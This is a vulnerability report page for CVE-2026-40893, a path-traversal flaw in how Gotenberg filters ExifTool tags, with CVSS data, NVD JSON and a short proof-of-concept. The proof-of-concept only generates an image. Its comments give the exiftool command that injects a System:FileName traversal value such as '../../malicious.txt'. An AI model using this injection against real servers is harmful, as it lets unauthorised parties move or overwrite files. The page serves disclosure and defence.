Security Vulnerability Report
CVE-2026-40893 CVSS 8.2 HIGH

CVE-2026-40893

Published: 2026-05-14 16:16:20
Last Modified: 2026-05-14 18:16:46

Description

Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Gotenberg < 8.31.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-40893
# This script demonstrates how to create a malicious image file
# that exploits the System:FileName tag bypass in Gotenberg < 8.31.0.
from PIL import Image

# Create a dummy image
img = Image.new('RGB', (100, 100), color='red')

# Exif data requires specific format, simulating the tag injection
# In a real exploit, we would inject the System:FileName tag
# 0x0131 is the tag ID for 'Software', but here we conceptually
# show where the System:FileName would be placed if using ExifTool directly.
# Since PIL doesn't support arbitrary System tags easily, we simulate
# the file that would be generated by:
# exiftool -System:FileName='../../malicious.txt' image.png

print("Vulnerability: CVE-2026-40893")
print("Impact: Arbitrary file rename/move via ExifTool tag injection")
print("Usage: Upload the generated image to a vulnerable Gotenberg endpoint.")

# Save the image
img.save('exploit_image.png')
print("Generated exploit_image.png. Modify its Exif data with 'System:FileName' using exiftool to complete the PoC.")

# Example command to make it exploitable:
# exiftool -System:FileName="/tmp/pwned.txt" exploit_image.png

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40893",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T16:16:20.323",
    "lastModified": "2026-05-14T18:16:45.910",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.31.0, Gotenberg only checks if the tag is exactly FileName, so System:FileName slips right through and ExifTool happily renames the file. This allows remote attackers to move, rename, and change permissions for arbitrary files. This vulnerability is fixed in 8.31.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-73"},
          {"lang": "en", "value": "CWE-184"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-62p3-hvxx-fxg4",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}